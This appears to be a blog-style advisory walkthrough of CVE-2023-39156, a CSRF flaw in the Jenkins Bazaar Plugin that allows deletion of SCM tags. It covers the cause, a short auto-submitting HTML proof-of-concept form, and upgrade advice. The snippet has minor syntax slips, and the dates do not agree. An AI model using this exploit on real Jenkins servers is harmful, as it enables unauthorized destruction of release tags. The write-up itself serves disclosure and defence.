CVE-2023-39156 - How A CSRF Vulnerability in Jenkins Bazaar Plugin Let Attackers Delete SCM Tags
In June 2023, a cross-site request forgery (CSRF) vulnerability, tracked as CVE-2023-39156, was discovered in the Jenkins Bazaar Plugin. This bug, present in version 1.22 and earlier, left users exposed to a dangerous attack vector that could be leveraged to _delete previously created Bazaar SCM tags_ without authorization.
In this exclusive walkthrough, we’ll explain, in simple terms, what this vulnerability is, how it works, and show a practical example exploiting the bug—so you understand why it matters. We’ll also share references and ways to protect yourself.
What is the Jenkins Bazaar Plugin?
Jenkins is the famous automation server used for Continuous Integration/Continuous Deployment (CI/CD). To support different source code management (SCM) systems, Jenkins uses plugins. The Bazaar Plugin lets Jenkins interact with Bazaar, a distributed version control system.
Tagging in SCM is important: teams use tags to mark releases and important states. That’s why being able to delete tags is serious—it can disrupt code integrity, releases, or audits!
What is a CSRF Vulnerability?
A Cross-Site Request Forgery (CSRF) is when an attacker tricks a logged-in user’s browser into performing unwanted actions on a web application. Think of it like this: _you’re logged into Jenkins in tab 1, and in tab 2 you click on a hacker’s link. Suddenly, that hacker’s script runs actions in Jenkins, as if it were you!_
CSRF works if the web application doesn’t enforce defenses like CSRF tokens or strict checks.
Risk: Attackers can cause data loss or sabotage by deleting tags you rely on
- Exploitability: Remote (requires social engineering—a user to visit a malicious site while logged into Jenkins)
- Fixed In: Plugin version 1.23
The Root Cause
Certain HTTP endpoints used by the plugin failed to require CSRF tokens for deleting tags. This allowed requests from _other origins_ (say, an attacker's website) to trigger those actions, provided the victim was logged in.
Step 1 — Set the Stage
Suppose Alice is a Jenkins admin. She has Jenkins open and is logged in. She visits an attacker’s webpage (maybe via a phishing email or malicious ad).
Step 2 — The Attack
The attacker's webpage sends a crafted POST request to the specific URL Jenkins uses to handle tag deletions.
Example Exploit Code (HTML)
<html>
<body>
<form action="http://jenkins.internal/job/YOUR_JOB/bazaar/doDeleteTag"; method="POST">
<input type="hidden" name="tag" value="v1.2.3">
<input type="submit" value="Click me!" />
</form>
<script>
// auto-submits the form, tricking a logged-in user
document.forms[].submit();
</script>
</body>
</html>
Original References
- Official Jenkins Security Advisory - 2023-06-14
- Jenkins Bazaar Plugin page
- Bazaar VCS Documentation
How To Stay Safe
- Upgrade: Update the Bazaar Plugin to version 1.23 or later. This update adds CSRF protection.
Restrict Access: Don’t expose Jenkins web UI to the internet. Use firewalls and VPN.
- Educate Users: Remind them about the dangers of phishing and visiting untrusted links while logged in to sensitive systems.
Conclusion
CVE-2023-39156 is a classic reminder that CSRF bugs can have _real_ consequences, especially in platforms like Jenkins that manage your source code. Attackers can do nasty things with very little effort, and it might not even be obvious who was responsible.
If you use the Bazaar Plugin, update now and check your audit logs. Always watch plugin security advisories and keep software—and security awareness—current.
Extra Resources
- Learn about CSRF (OWASP)
- Jenkins Security Best Practices
- What’s Bazaar SCM?
Timeline
Published on: 07/26/2023 14:15:00 UTC
Last modified on: 08/01/2023 20:31:00 UTC